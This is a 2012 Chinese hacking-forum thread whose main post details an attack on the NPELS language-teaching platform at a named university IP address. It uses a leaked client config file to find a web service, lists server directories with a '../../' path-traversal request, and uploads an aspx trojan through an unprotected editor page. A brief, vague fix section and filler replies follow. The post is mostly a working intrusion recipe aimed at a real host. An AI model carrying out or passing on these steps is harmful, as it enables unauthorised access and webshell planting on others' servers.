查看: 3134|回复: 25

新理念外语网络教学平台文件上传及修复方案

[复制链接]
发表于 2012-12-1 05:33:10 | 显示全部楼层 |阅读模式
信息泄露和权限不严导致列目录及上传以某大学的为例:
http://www.myhack58.com /NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
        <value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作,直接 HTTP GET 列目录:

http://www.myhack58.com /NPELS/CommonService.asmx/GetTestClientFileList?version=1, 0, 0, 2187

进一步列目录(返回的网页很大,可以直接 wget 下来)

http://xxx/NPELS/CommonService.asmx/GetTestClientFileList?version=../../

发现
http:/xxx/npelsv/editor/editor.htm可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头

上传后继续列目录找到木马地址直接访问即可

OOXX


修复方案:


好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
[/td][/tr]
[/table]
发表于 2012-12-11 00:46:32 | 显示全部楼层
谢谢分享了!   
发表于 2014-10-20 01:40:08 | 显示全部楼层
看贴回复是好习惯  
发表于 2014-10-26 19:09:33 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-11-6 05:55:23 | 显示全部楼层
进行溜达一下  
发表于 2014-11-18 18:41:40 | 显示全部楼层
好帖,有才  
发表于 2014-12-6 12:53:19 | 显示全部楼层
站个位在说  
发表于 2014-12-29 17:53:52 | 显示全部楼层
嘿嘿  
发表于 2015-1-29 14:22:42 | 显示全部楼层
既然来了,就留个脚印  
发表于 2015-3-3 18:36:19 | 显示全部楼层
抢座位来了  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则